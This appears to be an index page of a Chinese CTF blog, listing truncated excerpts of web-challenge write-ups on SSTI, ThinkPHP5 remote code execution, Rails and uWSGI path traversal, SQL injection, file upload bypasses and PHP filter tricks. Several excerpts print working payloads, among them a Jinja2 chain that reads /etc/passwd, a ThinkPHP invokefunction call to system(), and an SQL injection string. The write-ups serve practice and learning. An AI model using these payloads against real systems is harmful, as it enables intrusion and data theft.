在源代码这里发现了好玩的： 点进去瞅一下哈： 根据提示，改一下Referer，改一下UA，改一下XFF就出来了，意外的简单。 因为最近忙好久没更新博客了，也算记录一下。

先注册，然后登录了，提示admin账号才给flag： 查看源码发现action.php?callback=getInfo 这个页面存在当前用户的csrftoken 御剑扫到了可疑的东西： 访问test.php得到E5xqqsvHoznsjlfDm5ryLg== 访问action.php?callback=getInfo，抓包把username改为E5xqqsvH…

学习： 从 flask+jinjia2 认识 SSTI 服务端模板注入 | AbelChe's Blog Tokyo Westerns CTF 2018 WEB Wp | 码农网 题目里只给出了一个源代码： import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route(…

[1] {{1+1}}测试，存在模板注入： [2] {{config.items()}} 可以查看服务器的配置信息： [3] 读取password信息： {{[].__class__.__base__.__subclasses__()[40]('/etc/passwd').read()}} [4] 命令执行，（ls列出文件）： {% for c in [].__class__.__base__.…

记笔记，对区块链不是很了解，还是萌萌qwq。 学习参考：区块链与51%算力攻击&2018-DDCTF-mini blockchain 51% （双花）攻击： 在比特币网络里，你有多少钱，不是你说了算，而是大家说了算，每个人都是公证人。”基于算力证明进行维护的比特币网络一直以来有一…

题目描述：Tornado 框架 /flag.txt flag in /fllllllllllllag /welcome.txt render /hints.txt md5(cookie_secret+md5(filename))根据题目描述可知使用了tornoda框架，进去后根据提示信息render和需要cookie_secret猜测会存在注入，把签名随便改一下就会跳转…

WEB部分 【Romance签到】 查看源码href="source.php" 找到hint.php 打开是： ♭‖§∮♯♭‖§∮♬♭‖§§♫♭‖§∮§♭‖§♩§♭‖♯♬¶♭‖§§♫♭‖§§¶♭‖♯¶§♭‖♯¶♫♭‖§∮♭♭‖§§♫♭‖§§♬♭‖♯♬♪♭‖♯¶♪♭‖♯¶‖♭‖♯¶♯♭‖♯♬♬♭‖♯♬♪♭‖♯¶♯♭‖♯¶♯♭‖♯¶∮♭‖§∮♭♭‖♯♬♪♭‖§§♬♭‖♯¶§♭‖♯¶‖♭‖§§♬♭‖♯♬♪♭‖§§♫♭‖♯¶♪♭‖♯¶♫♭‖♯¶§♭‖…

ThinkPHP5.x rec 漏洞分析与复现通过参考这篇文章，得到payload ?s=index/\think\App/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=dir 又因为只可以执行linux命令，命令行直接运行PHP代码： php -r "phpinfo();" 所以这道题的pa…

注册了个账号，然后登录。 没找到啥漏洞，修改密码那里抓包，md5解不开。。 返回findpwd这里，重置新密码这里抓包： 成功把admin的密码重置了。 点击管理，提示： 行8，改xff头为127.0.0.1 得到提示： index.php?module=filemanage&do=??? 构造： /index.php…

题意是让买超级独角兽。 可以输入id和价钱，id为4，价钱输入1337， 提示：Only one char(?) allowed!（只允许输入一个字符） 查看源码，在utf-8旁边有一句提示： Ah,really important,seriously. emm...查阅资料发现就是utf-8的编码转换问题。在这个网站查询…

每天练练BUU，天天学到的新姿势.JPG 查看源码发现一行注释： 考虑到应该是登录以admin登录。先以test/test注册，登录康康，在/change这里发现题目给了一处源码： 不管是login、register还是change页面，只要是关于session['name']的操作， 都先用了strlower…

打开主页，跳转到了/index.php?jpg=hei.jpg 并且只有一张这样的以base64形式放入的图片。 把?jpg=hei.jpg替换为?jpg=index.php base64解码后得到如下代码：

首先ctrl+u查看源代码，发现calc.php： 访问calc.php，查看源代码：

Ruby On Rails 路径穿越漏洞（CVE-2018-3760） Ruby On Rails在开发环境下使用Sprockets作为静态文件服务器，Ruby On Rails是著名Ruby Web开发框架，Sprockets是编译及分发静态资源文件的Ruby库。 Sprockets 3.7.1及之前版本中，存在一处因为二次解码导致的…

uWSGI是一款Web应用程序服务器，它实现了WSGI、uwsgi和http等协议。 uWSGI 2.0.17之前版本中存在路径遍历漏洞，该漏洞源于程序没有正确的处理DOCUMENT_ROOT检测。攻击者可通过发送带有‘..’序列的特制URL请求利用该漏洞查看系统上的任意文件。 payload： http…

【最简单的sql注入】 题目地址 输入万能密码 admin' or 1=1#即可【到底能不能回显】 小明经过学习，终于对SQL注入有了理解，她知道原来sql注入的发生根本原因还是数据和语句不能正确分离的原因，导致数据作为sql语句执行；但是是不是只要能够控制sql语句的一…

文件上传：1.第一关，只是在前端验证了文件格式，上传一个shell.jpg，然后抓包改成shell.php绕过。2.只是验证了Content-Type，上传shell.php抓包修改为Content-Type：image/jpeg上传。3.可上传php3,php5...等这样可以被服务器解析的后缀名。4.过滤了好多，但…

SeaCMS V9.1以下版本SQL注入漏洞 获取管理员表的第一个用户的账号和管理员表中第一个用户的密码的md5值需要在脚本的同级目录新建一个dir.txt里面存放网址 #SeaCMS #Author：Root import requests import time import re dir = open('dir.txt','r') for i in …

开局一篇简短的代码

首页有三个超链接： /flag.txt 提示flag in /fllllllllllllag /welcome.txt 提示render /hints.txt 提示md5(cookie_secret+md5(filename)) 刚开始试了下hash长度扩展攻击 不对，返回Error 后来学习了一下服务器端模板注入（SSTI） 尝试了输入/error?msg={{1}…

level17 = $range); uslee…

把正则摘下来分析以下： preg_match("/flag.*php.{4,7}key:\/.\/(.*regex):punct:[a-z]/i", trim($_GET["id"]), $match); /fl…

打开是一个登录框，抓包把Cooike中的 source=0 改成1

地球已经危在旦夕，此时火星已适合人类居住，地球人将移民火星，方舟计划应运而生，平 凡的你因支付不起昂贵的方舟船票，所以你能寄托于买彩票中大奖从而获得一线生机，但是 向来非洲血统的你怎么抽的中大奖呢，你现在危在旦夕，此时你如谈想起来你有个超高…

审计php代码,while函数根据page参数来判断php文件是否存在，如果存在此文件，则进行文件包含。 默认页面为http://127.0.0.1/index.php,设置为page值，可确保while为真 利用hello参数将执行内容显示http://192.16…

题目描述： 其他破坏者会利用工控云管理系统设备维护中心的后门入侵系统 设备维护中心的url是这样的： http://ip:port/index.php?page=index 尝试了以下php伪协议（php://filter/read=convert.base64-encode/resource=index.php） 拿到了主页的源代码，太长…